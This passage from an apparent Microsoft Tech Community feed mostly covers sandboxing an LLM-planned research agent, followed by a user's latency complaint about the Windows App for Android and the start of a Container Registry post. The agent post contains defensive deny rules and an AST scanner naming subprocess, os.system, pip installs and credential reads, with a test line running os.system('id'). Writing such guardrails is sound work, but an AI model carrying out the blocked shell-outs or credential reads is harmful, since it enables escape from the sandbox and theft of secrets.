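    """Return a list of human-readable violations found in the snippet."""
    violations = []
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            # Catches `import subprocess` and `import subprocess as sp`.
            for alias in node.names:
                if alias.name.split(".")[0] in BLOCKED_MODULES:
                    violations.append(f"import {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            # Catches `from subprocess import Popen as p`.
            if (node.module or "").split(".")[0] in BLOCKED_MODULES:
                violations.append(f"from {node.module} import ...")
        elif isinstance(node, ast.Attribute):
            # Catches attribute access such as `os.system` or `os.spawnl`.
            base = node.value
            if isinstance(base, ast.Name) and base.id == "os":
                if node.attr in BLOCKED_OS_CALLS or node.attr.startswith("spawn"):
                    violations.append(f"os.{node.attr}")
    return violations


print(find_subprocess_use("from subprocess import Popen as p"))
print(find_subprocess_use("import os\nos.system('id')"))
print(find_subprocess_use("print('hello')"))&lt;/LI-CODE&gt;
&lt;P&gt;The aliased import in the first call is flagged because the walk inspects the module being imported, not the name it is bound to.&lt;/P&gt;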
&lt;P data-line="260"&gt;&lt;STRONG&gt;At sandbox creation (Azure-side, once per session):&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="262"&gt;
&lt;LI data-line="262"&gt;aca_config_from_policy&amp;nbsp;projects&amp;nbsp;defaults.max_cpu&amp;nbsp;/&amp;nbsp;defaults.max_memory_mb&amp;nbsp;onto the sandbox's CPU and memory ceilings.&lt;/LI&gt;
&lt;LI data-line="265"&gt;network_allowlist&amp;nbsp;plus&amp;nbsp;defaults.network_default&amp;nbsp;are turned into a typed&amp;nbsp;EgressPolicy(default_action="Deny", host_rules=[EgressHostRule(pattern, action="Allow"), …])&amp;nbsp;and applied via&amp;nbsp;SandboxClient.set_egress_policy. The policy is&amp;nbsp;&lt;STRONG&gt;fail-closed by default&lt;/STRONG&gt;&amp;nbsp;— even with an empty allowlist you get a sandbox with no outbound network.&lt;/LI&gt;
&lt;/OL&gt;
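&lt;P&gt;The fail-closed behavior is easy to model. The sketch below is not the ACA egress proxy or the SDK's EgressPolicy type: egress_decision is a hypothetical function, and glob-style host patterns matched with fnmatch are an assumption made for illustration. What it does show is the property described above, that an empty allowlist denies everything.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from fnmatch import fnmatch


def egress_decision(host, allow_patterns, default_action="Deny"):
    """Return "Allow" if the host matches a pattern, else the default action."""
    for pattern in allow_patterns:
        # Glob-style matching is an assumption made for this sketch.
        if fnmatch(host.lower(), pattern.lower()):
            return "Allow"
    return default_action


allowlist = ["arxiv.org", "*.githubusercontent.com"]
print(egress_decision("arxiv.org", allowlist))
print(egress_decision("raw.githubusercontent.com", allowlist))
print(egress_decision("example.com", allowlist))
print(egress_decision("arxiv.org", []))&lt;/LI-CODE&gt;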
&lt;P data-line="272"&gt;&lt;STRONG&gt;Per execution:&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="274"&gt;
&lt;LI data-line="274"&gt;&lt;EM&gt;Azure-side, every call.&lt;/EM&gt;&amp;nbsp;The egress proxy enforces the egress policy set at sandbox creation on every outbound connection inside the sandbox. A blocked host produces an HTTP 403 inside the guest; the snippet's own error handler can detect that, and the provider's caller surfaces it as a&amp;nbsp;blocked-at-egress&amp;nbsp;outcome.&lt;/LI&gt;
&lt;LI data-line="279"&gt;&lt;EM&gt;Host-side, post-exec tripwire.&lt;/EM&gt;&amp;nbsp;After&amp;nbsp;SandboxClient.exec&amp;nbsp;returns, the provider compares the measured&amp;nbsp;duration_seconds&amp;nbsp;against&amp;nbsp;defaults.timeout_seconds&amp;nbsp;and, if the budget was exceeded, sets&amp;nbsp;result.killed=True&amp;nbsp;and a&amp;nbsp;kill_reason&amp;nbsp;on the returned&amp;nbsp;SandboxResult. This is an&amp;nbsp;&lt;STRONG&gt;advisory marker&lt;/STRONG&gt;, not a kill signal: the snippet has already finished, and the sandbox session itself stays alive and reusable. Acting on it (abandoning the session, surfacing a timeout decision) is the agent loop's job — see how run_step in section 6.3 turns it into a "timeout" receipt.&lt;/LI&gt;
&lt;/OL&gt;
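&lt;P&gt;The post-exec tripwire can be pictured roughly as follows. This is a sketch under stated assumptions: ResultSketch is a hypothetical stand-in for the fields of SandboxResult mentioned above, and apply_timeout_tripwire is an illustrative helper, not the provider's actual code.&lt;/P&gt;

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class ResultSketch:
    """Hypothetical stand-in for the fields of SandboxResult used here."""
    success: bool
    duration_seconds: float
    killed: bool = False
    kill_reason: Optional[str] = None


def apply_timeout_tripwire(result, timeout_seconds):
    """Mark a finished result as over budget; nothing is terminated."""
    if result.duration_seconds > timeout_seconds:
        result.killed = True
        result.kill_reason = (
            f"exceeded timeout_seconds={timeout_seconds} "
            f"(took {result.duration_seconds:.1f}s)"
        )
    return result


fast = apply_timeout_tripwire(ResultSketch(True, 1.4), timeout_seconds=90)
slow = apply_timeout_tripwire(ResultSketch(True, 120.0), timeout_seconds=90)
print(fast.killed, slow.killed, slow.kill_reason)
```

&lt;P&gt;Note that the slow result keeps success=True: the marker records that the budget was exceeded, and the caller decides what to do with that.&lt;/P&gt;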
&lt;P&gt;One PolicyDocument, six enforcement points, three different locations. The model is never trusted; each guarantee is enforced by the component closest to the resource it protects.&lt;/P&gt;
&lt;H2 data-line="324"&gt;6. The example: an LLM-planned research agent&lt;/H2&gt;
&lt;P data-line="326"&gt;The agent does one thing: given a&amp;nbsp;&lt;EM&gt;research ticket&lt;/EM&gt;&amp;nbsp;— a small JSON document like&amp;nbsp;{"topic": "differential privacy", "depth": "survey"}&amp;nbsp;— produce a short literature summary. To do that it needs to (a) read papers from arXiv, (b) skim associated GitHub READMEs, and (c) optionally query a local search index. Nothing else.&lt;/P&gt;
&lt;P data-line="332"&gt;The interesting part is&amp;nbsp;&lt;STRONG&gt;how the agent decides what code to run&lt;/STRONG&gt;. A GPT-class planner is asked to break the ticket into a list of steps, each step a short Python snippet. Those snippets are then executed one at a time — each one passing through the six-point gauntlet from section 5.&lt;/P&gt;
&lt;H3 data-line="338"&gt;6.1 Install&lt;/H3&gt;
&lt;LI-CODE lang="bash"&gt;# agt-sandbox with the Azure provider + the policy engine
pip install "agt-sandbox[azure,policy]"

# Early-access Azure Container Apps sandbox SDK
pip install azure-containerapps-sandbox

# Optional: only needed for the LLM planner in section 6.3
pip install openai&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;One-time Azure setup (resource group must already exist — the provider auto-creates the &lt;EM&gt;sandbox group&lt;/EM&gt; on first use, but not the resource group):&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;az login
az group create --name agents-rg --location westus2

$env:AZURE_SUBSCRIPTION_ID = (az account show --query id -o tsv)
$env:AZURE_RG = "agents-rg"
$env:AZURE_REGION = "westus2"&lt;/LI-CODE&gt;
&lt;P&gt;Quick smoke check:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sandbox import ACASandboxProvider
from agent_os.policies import PolicyDocument

print("ok")&lt;/LI-CODE&gt;
&lt;P&gt;You can ignore the deprecation warning this prints. The packages are in the middle of a migration, and the warning will be fixed soon.&lt;/P&gt;
&lt;H3 data-line="374"&gt;6.2 The policy&lt;/H3&gt;
&lt;P data-line="376"&gt;aca_research_agent.yaml&amp;nbsp;— every field is a&amp;nbsp;&lt;STRONG&gt;native&amp;nbsp;PolicyDocument&amp;nbsp;field&lt;/STRONG&gt;, no Python wrapper:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;name: research-agent
version: "2"

defaults:
  action: allow
  max_cpu: 1.0             # → sandbox CPU cap = 1000 millicores
  max_memory_mb: 2048      # → sandbox memory cap = 2048 MiB
  timeout_seconds: 90      # per-execute_code wall-clock budget (advisory tripwire)
  network_default: deny    # fail-closed (also the schema default)

network_allowlist:
  - api.openai.com
  - api.arxiv.org
  - export.arxiv.org
  - "*.github.com"
  - pypi.org
  - files.pythonhosted.org

tool_allowlist:
  - fetch_arxiv
  - fetch_github_readme
  - search_index

rules:
  - name: deny-shell-out-subprocess
    condition: { field: code, operator: contains, value: "subprocess" }
    action: deny
    priority: 100
    message: "shell-out blocked by research-agent policy"

  - name: deny-pip-install
    condition: { field: code, operator: contains, value: "pip install" }
    action: deny
    priority: 100
    message: "ad-hoc dependency installs are not permitted"

  - name: deny-secret-openai
    condition: { field: code, operator: contains, value: "OPENAI_API_KEY" }
    action: deny
    priority: 100
    message: "agents may not read host credentials"

  # Tool-allowlist gate. Fires only when the eval context carries a
  # `tool_name`; untagged execute_code calls are unaffected.
  - name: deny-tool-not-in-allowlist
    condition:
      field: tool_name
      operator: not_in
      value: [fetch_arxiv, fetch_github_readme, search_index]
    action: deny
    priority: 200
    message: "tool not in research-agent tool_allowlist"&lt;/LI-CODE&gt;
&lt;P data-line="434"&gt;Two properties to keep in mind:&lt;/P&gt;
&lt;OL data-line="436"&gt;
&lt;LI data-line="436"&gt;&lt;STRONG&gt;Network is fail-closed.&lt;/STRONG&gt;&amp;nbsp;Any host not on&amp;nbsp;network_allowlist&amp;nbsp;is denied at the Azure egress proxy. An empty allowlist produces a sandbox with no outbound network.&lt;/LI&gt;
&lt;LI data-line="439"&gt;&lt;STRONG&gt;tool_allowlist&amp;nbsp;only fires when the call is tagged.&lt;/STRONG&gt;&amp;nbsp;Plain&amp;nbsp;execute_code_async(...)&amp;nbsp;has no&amp;nbsp;tool_name. Calls that pass&amp;nbsp;context={"tool_name": "evil_tool"}&amp;nbsp;get denied host-side.&lt;/LI&gt;
&lt;/OL&gt;
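&lt;P&gt;The second property is easier to see in code. The evaluator below is a simplified sketch, not the PolicyDocument engine: the evaluate function, the flattened rule dictionaries, and the choice to check higher-priority rules first are all assumptions made for illustration. What it does show is why a rule on tool_name cannot fire when the context has no tool_name.&lt;/P&gt;

```python
RULES = [
    {"name": "deny-shell-out-subprocess", "field": "code",
     "operator": "contains", "value": "subprocess", "action": "deny",
     "priority": 100, "message": "shell-out blocked by research-agent policy"},
    {"name": "deny-tool-not-in-allowlist", "field": "tool_name",
     "operator": "not_in", "action": "deny",
     "value": ["fetch_arxiv", "fetch_github_readme", "search_index"],
     "priority": 200, "message": "tool not in research-agent tool_allowlist"},
]


def evaluate(rules, context, default_action="allow"):
    """Return (action, message) for one call; a sketch, not the real engine."""
    # Assumption: higher-priority rules are checked first.
    for rule in sorted(rules, key=lambda r: r["priority"], reverse=True):
        if rule["field"] not in context:
            continue  # untagged calls never trigger a rule on a missing field
        actual = context[rule["field"]]
        if rule["operator"] == "contains":
            fired = rule["value"] in actual
        elif rule["operator"] == "not_in":
            fired = actual not in rule["value"]
        else:
            fired = False
        if fired:
            return rule["action"], rule["message"]
    return default_action, None


print(evaluate(RULES, {"code": "print(1)"}))
print(evaluate(RULES, {"code": "print(1)", "tool_name": "evil_tool"}))
print(evaluate(RULES, {"code": "import subprocess"}))
```

&lt;P&gt;The first call is allowed because no rule applies to it, the second is denied by the tool gate, and the third is denied by the substring rule on code.&lt;/P&gt;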
&lt;P data-line="443"&gt;Validate before committing:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;python -m agent_os.policies.cli validate aca_research_agent.yaml
# OK&lt;/LI-CODE&gt;
&lt;H3 data-line="448"&gt;6.3 The agent&lt;/H3&gt;
&lt;LI-CODE lang="python"&gt;import asyncio, json, os, time, uuid
from dataclasses import dataclass

from agent_os.policies import PolicyDocument
from agent_sandbox import ACASandboxProvider
from openai import AsyncOpenAI


@dataclass
class Step:
    index: int
    intent: str
    code: str


@dataclass
class StepReceipt:
    step_index: int
    intent: str
    decision: str  # allowed | denied-by-policy | blocked-at-egress | timeout | error
    reason: str | None
    azure_sandbox_id: str
    duration_seconds: float
    stdout_excerpt: str


PLANNER_SYSTEM = """You are a research planner. Output JSON of the form
{"steps":[{"intent": str, "code": str}, ...]} where each `code` is
self-contained Python using only the standard library (use urllib.request
for HTTP, not requests). Snippets may reach: api.arxiv.org, export.arxiv.org,
*.github.com, pypi.org. No installs, no shell, no secrets."""


async def plan(client: AsyncOpenAI, ticket: dict) -&amp;gt; list[Step]:
    resp = await client.chat.completions.create(
        model="gpt-4o-mini",
        response_format={"type": "json_object"},
        messages=[
            {"role": "system", "content": PLANNER_SYSTEM},
            {"role": "user", "content": json.dumps(ticket)},
        ],
    )
    plan = json.loads(resp.choices[0].message.content)
    return [Step(i, s["intent"], s["code"]) for i, s in enumerate(plan["steps"])]


async def run_step(provider, agent_id, session_id, step: Step) -&amp;gt; StepReceipt:
    started = time.monotonic()
    try:
        exec_handle = await provider.execute_code_async(
            agent_id, session_id, step.code,
            context={"step_index": step.index, "intent": step.intent},
        )
    except PermissionError as exc:
        # Host-side policy denial: the snippet never reached Azure.
        return StepReceipt(step.index, step.intent, "denied-by-policy", str(exc),
                           session_id, time.monotonic() - started, "")

    res = exec_handle.result
    combined = (res.stdout or "") + (res.stderr or "")
    egress_block = "egress-blocked" in combined or "HTTP Error 403" in combined

    if getattr(res, "killed", False):
        decision, reason = "timeout", getattr(res, "kill_reason", "timeout")
    elif egress_block:
        decision, reason = "blocked-at-egress", "Azure egress proxy denied a host"
    elif res.success:
        decision, reason = "allowed", None
    else:
        decision, reason = "error", (res.stderr or "").strip()[:200]

    return StepReceipt(
        step.index, step.intent, decision, reason, session_id,
        time.monotonic() - started, (res.stdout or "").strip()[:200],
    )


async def main(ticket_path: str) -&amp;gt; None:
    ticket = json.loads(open(ticket_path, encoding="utf-8").read())
    policy = PolicyDocument.from_yaml("aca_research_agent.yaml")

    missing = [k for k in ("AZURE_SUBSCRIPTION_ID", "AZURE_RG") if not os.environ.get(k)]
    if missing:
        raise SystemExit(f"missing env vars: {', '.join(missing)}")

    provider = ACASandboxProvider(
        subscription_id=os.environ["AZURE_SUBSCRIPTION_ID"],
        resource_group=os.environ["AZURE_RG"],
        sandbox_group="agents",
        region=os.environ.get("AZURE_REGION", "westus2"),
        disk="python-3.13",
        ensure_group_location=os.environ.get("AZURE_REGION", "westus2"),
    )
    if not provider.is_available():
        raise SystemExit(provider.unavailable_reason)

    agent_id = f"research-{uuid.uuid4().hex[:6]}"
    handle = await provider.create_session_async(agent_id, policy=policy)
    try:
        steps = await plan(AsyncOpenAI(), ticket)
        receipts = [await run_step(provider, agent_id, handle.session_id, s) for s in steps]
        print(json.dumps([r.__dict__ for r in receipts], indent=2, default=str))
    finally:
        await provider.destroy_session_async(agent_id, handle.session_id)


if __name__ == "__main__":
    import sys
    asyncio.run(main(sys.argv[1]))&lt;/LI-CODE&gt;
&lt;P&gt;Run it against {"topic": "differential privacy", "depth": "survey"} and you get a JSON array of receipts on stdout — one per planner step. A typical five-step plan produces output along the lines of:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;[
  {"step_index": 0, "intent": "fetch arXiv search results",
   "decision": "allowed", "reason": null,
   "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 1.42,
   "stdout_excerpt": "{\"feed\": {\"entry\": [{\"id\": \"http://arxiv.org/abs/2201.12345v2\", ..."},
  {"step_index": 1, "intent": "download README for top GitHub repo",
   "decision": "allowed", "reason": null,
   "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.88,
   "stdout_excerpt": "# opendp\n\nThe OpenDP Library is a modular collection..."},
  {"step_index": 2, "intent": "shell out to grep README",
   "decision": "denied-by-policy",
   "reason": "Policy denied: shell-out blocked by research-agent policy",
   "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.003,
   "stdout_excerpt": ""},
  {"step_index": 3, "intent": "fetch related blog post from third-party site",
   "decision": "blocked-at-egress",
   "reason": "Azure egress proxy denied a host",
   "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.41,
   "stdout_excerpt": "egress-blocked HTTPError HTTP Error 403: Forbidden"},
  {"step_index": 4, "intent": "summarize collected abstracts",
   "decision": "allowed", "reason": null,
   "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.32,
   "stdout_excerpt": "Summary: differential privacy research in 2024-2026..."}
]&lt;/LI-CODE&gt;
&lt;P data-line="586"&gt;Three things to notice:&lt;/P&gt;
&lt;UL data-line="588"&gt;
&lt;LI data-line="588"&gt;Step 2 (subprocess) was rejected&amp;nbsp;&lt;STRONG&gt;host-side&lt;/STRONG&gt;&amp;nbsp;in ~3 ms with no Azure round-trip —&amp;nbsp;duration_seconds&amp;nbsp;and the empty&amp;nbsp;stdout_excerpt&amp;nbsp;confirm it never left the host process.&lt;/LI&gt;
&lt;LI data-line="591"&gt;Step 3 went to Azure, but the egress proxy returned HTTP 403. The snippet's own error handling printed the failure, and&amp;nbsp;run_step&amp;nbsp;recognized the&amp;nbsp;"HTTP Error 403"&amp;nbsp;marker in the output and recorded a clean&amp;nbsp;blocked-at-egress&amp;nbsp;decision instead of a hard failure.&lt;/LI&gt;
&lt;LI data-line="594"&gt;The session survives both rejections. Step 4 still runs to completion — denials and egress blocks do not poison the sandbox.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="593"&gt;What you've enforced&lt;/H2&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Concern&lt;/th&gt;&lt;th&gt;Where enforced&lt;/th&gt;&lt;th&gt;Mechanism&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Shell-out, pip-install, credential exfiltration&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;PolicyDocument&amp;nbsp;deny&amp;nbsp;rules →&amp;nbsp;PermissionError&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Subprocess invocation that slips past substring rules&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;enforce_no_subprocess_execution&amp;nbsp;AST scan →&amp;nbsp;SandboxCodeViolation&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Calls to tools outside the allowlist&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;deny-tool-not-in-allowlist&amp;nbsp;rule&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Outbound traffic to disallowed hosts&lt;/td&gt;&lt;td&gt;Azure egress proxy&lt;/td&gt;&lt;td&gt;network_allowlist&amp;nbsp;→&amp;nbsp;EgressPolicy&amp;nbsp;(Deny + per-host Allow)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;CPU / memory ceiling&lt;/td&gt;&lt;td&gt;Azure sandbox VM&lt;/td&gt;&lt;td&gt;defaults.max_cpu&amp;nbsp;/&amp;nbsp;defaults.max_memory_mb&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Per-step wall-clock tripwire&lt;/td&gt;&lt;td&gt;Host, post-exec (advisory)&lt;/td&gt;&lt;td&gt;defaults.timeout_seconds&amp;nbsp;→&amp;nbsp;SandboxResult.killed=True&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Audit trail&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;Per-step receipts from&amp;nbsp;run_step&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P data-line="611"&gt;The model is never trusted. Each guarantee is enforced by the component closest to the resource it protects, and a single signed PolicyDocument drives all of them.&lt;/P&gt;
&lt;H2 data-line="619"&gt;Closing thoughts&lt;/H2&gt;
&lt;P data-line="627"&gt;A few things worth keeping in mind:&lt;/P&gt;
&lt;UL data-line="629"&gt;
&lt;LI data-line="629"&gt;&lt;STRONG&gt;One&amp;nbsp;PolicyDocument&amp;nbsp;is the artefact.&lt;/STRONG&gt;&amp;nbsp;Host-side rules, AST scan, ACA egress proxy, CPU / memory caps, timeouts — all driven by one YAML file. Treat it like code: review it, diff it, and validate it in CI.&lt;/LI&gt;
&lt;LI data-line="633"&gt;&lt;STRONG&gt;Fail-closed by default.&lt;/STRONG&gt;&amp;nbsp;ACA's&amp;nbsp;network_default: deny&amp;nbsp;is the setting you want. Every host the agent reaches should be in the allowlist, by name, in a reviewable diff.&lt;/LI&gt;
&lt;LI data-line="636"&gt;&lt;STRONG&gt;Read the receipts.&lt;/STRONG&gt;&amp;nbsp;StepReceipt&amp;nbsp;JSON is the audit trail. Pipe it into Log Analytics and alert on&amp;nbsp;denied-by-policy&amp;nbsp;and&amp;nbsp;blocked-at-egress&amp;nbsp;spikes — they're either attacks or planner regressions.&lt;/LI&gt;
&lt;LI data-line="640"&gt;&lt;STRONG&gt;The model is never trusted.&lt;/STRONG&gt;&amp;nbsp;Every check in this post exists because the moment you trust the model, you've also trusted whatever fed it its last few tokens.&lt;/LI&gt;
&lt;/UL&gt;
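&lt;P&gt;As a starting point for the receipt monitoring suggested above, the sketch below counts decisions in a batch of receipts and flags the two worth alerting on. The summarize_receipts helper and its threshold parameter are hypothetical, and shipping the result to Log Analytics is left out.&lt;/P&gt;

```python
import json
from collections import Counter

ALERT_DECISIONS = ("denied-by-policy", "blocked-at-egress")


def summarize_receipts(receipts_json, threshold=1):
    """Count decisions and list the ones at or above the alert threshold."""
    receipts = json.loads(receipts_json)
    counts = Counter(r["decision"] for r in receipts)
    alerts = [d for d in ALERT_DECISIONS if counts[d] >= threshold]
    return counts, alerts


sample = json.dumps([
    {"step_index": 0, "decision": "allowed"},
    {"step_index": 2, "decision": "denied-by-policy"},
    {"step_index": 3, "decision": "blocked-at-egress"},
    {"step_index": 4, "decision": "allowed"},
])
counts, alerts = summarize_receipts(sample)
print(dict(counts), alerts)
```

&lt;P&gt;In practice the threshold would be tuned per agent, since a planner that occasionally proposes a blocked host is normal and a sudden run of denials is not.&lt;/P&gt;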
&lt;P data-line="644"&gt;The project lives at&amp;nbsp;&lt;A href="https://github.com/microsoft/agent-governance-toolkit" target="_blank" rel="noopener" data-href="https://github.com/microsoft/agent-governance-toolkit"&gt;github.com/microsoft/agent-governance-toolkit&lt;/A&gt;. Issues, PRs, and war stories welcome.&lt;/P&gt;</description>
      <pubDate>Fri, 05 Jun 2026 22:40:19 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/govern-ai-agents-using-agent-governance-toolkit-and-azure/ba-p/4526011</guid>
      <dc:creator>amolravande</dc:creator>
      <dc:date>2026-06-05T22:40:19Z</dc:date>
    </item>
    <item>
      <title>ISSUE - Windows App (Android) - Input latency and frozen screens with RemoteApps and handhelds</title>
      <link>https://techcommunity.microsoft.com/t5/azure-virtual-desktop-feedback/issue-windows-app-android-input-latency-and-frozen-screens-with/idi-p/4525730</link>
      <description>&lt;P&gt;Good morning, ladies and gentlemen,&lt;/P&gt;&lt;P&gt;TL;DR: The current Windows App for Android changed something in the background, causing massive input latency.&lt;/P&gt;&lt;P&gt;This is a report from an end-user point of view. We have been having performance and latency issues with the current Windows App (Android) for almost eight weeks now. The issue shows up as massive latency when giving input to a RemoteApp-connected Windows Terminal Server (WS2022DC).&lt;/P&gt;&lt;P&gt;For troubleshooting, we went through EVERYTHING: changed GPOs to connect only via TCP instead of UDP, cleared user profiles, even provisioned new VMs with new update states, and went back to the March updates.&lt;/P&gt;&lt;P&gt;I never thought I would have to roll the App back to last January's version to solve these issues (try doing that in an enterprise with about 100 handhelds, specifically assigned to warehouse and delivery management)...&lt;/P&gt;&lt;P&gt;We definitely need more transparent patch notes (really, Microsoft? It's 2026 and you push updates without publishing any release notes, not even known issues?!) and a way to downgrade versions without re-provisioning the whole RDP client for Android...&lt;/P&gt;&lt;P&gt;I am looking forward to hearing from others around the world who use RemoteApps with Android handheld scanners and RDS2022.&lt;/P&gt;&lt;P&gt;Best regards,&lt;/P&gt;&lt;P&gt;xSOU1 | Jules&lt;/P&gt;</description>
      <pubDate>Fri, 05 Jun 2026 06:28:37 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-virtual-desktop-feedback/issue-windows-app-android-input-latency-and-frozen-screens-with/idi-p/4525730</guid>
      <dc:creator>xSOU1</dc:creator>
      <dc:date>2026-06-05T06:28:37Z</dc:date>
    </item>
    <item>
      <title>Regional Endpoints for Azure Container Registry Geo-Replication — Now in Public Preview</title>
      <link>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/regional-endpoints-for-azure-container-registry-geo-replication/ba-p/4525717</link>
      <description>&lt;P&gt;By &lt;A class="lia-external-url" href="https://www.linkedin.com/in/johnsonshi/" target="_blank" rel="noopener"&gt;Johnson Shi&lt;/A&gt;, &lt;A class="lia-external-url" href="https://www.linkedin.com/in/zhuyul/" target="_blank" rel="noopener"&gt;Zoey (Zhuyu) Li&lt;/A&gt;, &lt;A class="lia-external-url" href="https://www.linkedin.com/in/huangli-wu-806070126/" target="_blank" rel="noopener"&gt;Huangli Wu&lt;/A&gt;&lt;/P&gt;
&lt;H2 id="what-s-new"&gt;What's new&lt;/H2&gt;
&lt;P&gt;Regional endpoints for geo-replicated Azure Container Registries are now in &lt;STRONG&gt;public preview&lt;/STRONG&gt;. See the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-geo-replication" target="_blank" rel="noopener"&gt;feature's official MS Learn documentation&lt;/A&gt;. If you've been following since the&amp;nbsp;&lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/regional-endpoints-for-geo-replicated-azure-container-registries-private-preview/4496186" target="_blank" rel="noopener" data-lia-auto-title="private preview announcement" data-lia-auto-title-active="0"&gt;private preview announcement&lt;/A&gt;, here's what changed:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;No feature flag registration.&lt;/STRONG&gt; No subscription enrollment is required, so all Azure subscriptions and customers can now use this feature.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;No CLI extension.&lt;/STRONG&gt; Regional endpoints commands are built into &lt;STRONG&gt;Azure CLI 2.86.0+&lt;/STRONG&gt; natively. If you installed the private preview &lt;CODE&gt;acrregionalendpoint&lt;/CODE&gt; extension, uninstall it to avoid conflicts.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Native CLI and portal support.&lt;/STRONG&gt;
&lt;UL&gt;
&lt;LI&gt;With&amp;nbsp;&lt;STRONG&gt;Azure CLI 2.86.0+&lt;/STRONG&gt;, enable regional endpoints for all geo-replicas of a registry with &lt;CODE&gt;az acr create --regional-endpoints enabled&lt;/CODE&gt; or &lt;CODE&gt;az acr update --regional-endpoints enabled&lt;/CODE&gt;.&lt;/LI&gt;
&lt;LI&gt;The Azure portal also supports configuring regional endpoints natively.&lt;/LI&gt;
&lt;/UL&gt;
&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;CLI flag rename for configuring a geo-replica's global endpoint routing (an existing separate feature).&lt;/STRONG&gt; The existing flag&amp;nbsp;&lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt; (on &lt;CODE&gt;az acr replication create/update&lt;/CODE&gt;) has been renamed to &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;.
&lt;UL&gt;
&lt;LI&gt;Key clarifications:
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;"--global-endpoint-routing" (formerly "--region-endpoint-enabled", on "az acr replication create / az acr replication update")&lt;/STRONG&gt;:&amp;nbsp;&lt;STRONG&gt;controls whether a specific geo-replica participates in global endpoint routing&lt;/STRONG&gt;. This is an existing feature, separate from the new registry-level "--regional-endpoints" feature discussed in this post.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;"--regional-endpoints" (on "az acr create / az acr update"):&amp;nbsp;enables or disables the regional endpoints feature at the registry level for all geo-replicas.&amp;nbsp;&lt;/STRONG&gt;This is the feature discussed in this post.&lt;/LI&gt;
&lt;/UL&gt;
&lt;/LI&gt;
&lt;LI&gt;See the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-endpoint-reference" target="_blank" rel="noopener"&gt;endpoint reference&lt;/A&gt; for the full breakdown of the various registry endpoints (global endpoints, regional endpoints, and data endpoints).&lt;/LI&gt;
&lt;/UL&gt;
&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;STRONG&gt;Regional endpoints are available on &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-skus" target="_blank" rel="noopener"&gt;Premium SKU&lt;/A&gt; registries in all Azure public cloud regions.&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2 id="what-are-regional-endpoints-"&gt;What are regional endpoints?&lt;/H2&gt;
&lt;P&gt;Regional endpoints give you dedicated, per-region login server URLs for each geo-replica with the following URL pattern:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;CODE&gt;myregistry.&lt;STRONG&gt;eastus.geo&lt;/STRONG&gt;.azurecr.io&lt;/CODE&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;CODE&gt;myregistry.&lt;STRONG&gt;westeurope.geo&lt;/STRONG&gt;.azurecr.io&lt;/CODE&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;STRONG&gt;Regional endpoints coexist with the registry's global endpoint &lt;/STRONG&gt;(&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;) — enabling regional endpoints doesn't disable a registry's global endpoint that is backed by Azure-managed routing. You can choose per workload:&lt;/P&gt;
&lt;UL&gt;
